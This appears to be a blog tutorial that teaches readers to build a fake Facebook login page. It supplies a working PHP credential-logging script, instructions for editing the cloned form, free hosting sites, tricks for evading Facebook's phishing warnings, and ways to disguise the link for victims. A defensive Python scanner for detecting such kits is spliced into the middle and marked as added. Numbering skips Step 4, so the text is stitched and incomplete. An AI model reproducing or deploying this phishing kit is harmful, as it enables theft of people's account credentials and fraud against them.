WHAT IS PHISHING?
Phishing is a technique for attempting to acquire sensitive or confidential information such as usernames, passwords, and credit card details by posing as a trustworthy entity in an electronic communication. This is done with the help of a phisher.
WHAT IS A PHISHER?
A phisher is a fake page that looks exactly like an original login page and writes the victim's login data (username and password) to a specific file, or does whatever you want so long as you get access to the victim's login data.
Here is an example of a fake facebook login page (phisher)
HOW TO MAKE A PHISHER?
As the saying goes:
- Don't give plenty of FISH to your friend. Instead, you should teach him how to PHISH
Therefore, instead of just giving you the download link to the already made phishing page, I am going to teach you how to make your own phishing page. At the end of this tutorial I will put a download link to my already made phishing pages, but first you have to learn how to make your own phisher :D
To create a successful phisher, all you need is a PHP enabled site , Notepad on your computer and a brain.
You can download Notepad v5.9++ here
Here is a list of php enabled free hosting sites:
- 110mb - http://110mb.com
- Ripway - http://ripway.com
- SuperFreeHost - http://superfreehost.info
- Freehostia - http://freehostia.com
- Freeweb7 - http://freeweb7.com
- t35 - http://t35.com
- Awardspace - http://awardspace.com
- PHPNet - http://phpnet.us
- Free Web Hosting Pro - http://freewebhostingpro.com
- ProHosts - http://prohosts.org
- FreeZoka - http://www.freezoka.com/
- 000webhost - http://000webhost.com/
- AtSpace - http://atspace.com
- My3gb - http://my3gb.com
STEP 1 -Creating the fake page
- Go to facebook's login page http://www.facebook.com
- On the top left corner of your Firefox browser, Click File ->Save page As and save your page name as facebook.html
- Open facebook.html Using Notepad and search for the word ''action''
class="menu_login_container"><form method="POST" action="https://ww w.facebook .com/login .php?login _attempt=1" id="login_form"
- Now change the method to ''get'' and action to ''login.php'' so that you will have something that looks like this;
STEP 2- Preparing the php script
- To create a PHP file, simply paste the code below into Notepad, then save it as login.php
------------------------------------------------------------------------------
<?php
header("Location: http://facebook.com/login.php ");
$handle = fopen("noobs.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
------------------------------------------------------------------------------
Note that in the above script, ''phished.txt'' is the file on which all hacked usernames and passwords will be saved and ''https://facebook.com/login.php'' is the Original facebook url where your victim will be redirected to after clicking the login button on your fake page. But at the moment facebook has tightened its security whereby your victim will get notified of a phishing attack and would therefore be prompted to change his password right after arriving from a phishing page.
To avoid this, you should redirect your victim to any other url which is not of facebook by replacing https://facebook.com/login.php with any url. Choosing the url to redirect your victim to will all depend on the trick that you will use against your victim in the whole phishing process.
Please also note that this part is mainly for facebook , its ok with several other sites like gmail, hotmail e.t.c your victim will not get a warning message, including mobile facebook (http://m.facebook.com).
STEP 3- Create File where to save hacked passwords
- Create an empty text file using notepad and rename it as phished
Note that when creating the text file, there is no need of renaming it as phished.txt because the fact that you will save it as a text file is enough to make it bear the extension of txt
Now you have 3 files so far;
- facebook.html
- login.php
- phished.txt
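For a hosting provider or incident responder reviewing uploaded site files, the three-file layout above leaves static traces: a password form switched to GET with a local handler on a page whose assets still point at another site, and a PHP script that loops over request parameters, writes them to a file and redirects. The scanner below is an added example, not code from the original post; its function names, trait list and sample strings are constructed for illustration.

```python
import re
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urlparse

# Three traits of the handler described above; a script showing all three is flagged.
PHP_TRAITS = {
    "iterates request parameters": r"foreach\s*\(\s*\$_(GET|POST|REQUEST)\b",
    "writes to a local file": r"\b(fwrite|fputs|file_put_contents)\s*\(",
    "redirects the visitor": r"header\s*\(\s*[\"']Location:",
}

class PageAudit(HTMLParser):
    """Records password forms and the hosts of absolute URLs on the page."""
    def __init__(self):
        super().__init__()
        self.forms, self.hosts, self._form = [], Counter(), None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        for key in ("href", "src"):
            host = urlparse(a.get(key, "")).hostname
            if host:
                self.hosts[host] += 1
        if tag == "form":
            self._form = {"method": a.get("method", "get").lower() or "get",
                          "action": a.get("action", ""), "password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form and a.get("type", "").lower() == "password":
            self._form["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None

def audit_html(text):
    page = PageAudit()
    page.feed(text)
    findings = []
    for form in (f for f in page.forms if f["password"]):
        if form["method"] == "get":
            findings.append("password submitted via GET (lands in URLs and access logs)")
        if not urlparse(form["action"]).netloc and page.hosts:
            brand = page.hosts.most_common(1)[0][0]
            findings.append(f"local form handler on a page built from {brand} assets")
    return findings

def audit_php(text):
    hits = [name for name, rx in PHP_TRAITS.items() if re.search(rx, text, re.I)]
    return hits if len(hits) == len(PHP_TRAITS) else []

# Constructed samples (not real captures): a cloned login form and a benign one.
CLONED = ('<link href="https://www.facebook.com/style.css">'
          '<form method="get" action="login.php"><input type="password" name="pass"></form>')
BENIGN = '<form method="post" action="/session"><input type="password" name="pw"></form>'
```

Each finding is a heuristic signal for manual review, not proof; a legitimate site can trip one trait, which is why `audit_php` reports only when all three appear together.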
STEP 5- Uploading the 3 files
Now go to http://my3gb.com and sign up for a free hosting account, then upload the 3 files as shown below
If your phisher has successfully been made, any email address and passwords that are typed on your fake page will be saved on the ''phished.txt'' file as shown in the image below
The link to your phishing page will therefore be;
www.yourusername.my3gb.com/facebook.html
NOTE THAT:
- No One will be so dumb to click on such a link
- Facebook will automatically block your phishing url from being posted on facebook
Your dot.tk domain name will look like this,... www.anyname.tk , any clicks on this link will be forwarded to your fake facebook page.
The good part is that..
- you can rename the phishing link to suit your victim's curiosity, thereby making it difficult for him to notice any phisher
- Your phisher will NOT be detected and blocked by facebook,..so you are free to post it or send it to a friend on facebook via inbox.
2 comments:
hahaha... nice post gan...
Thanx dude :xD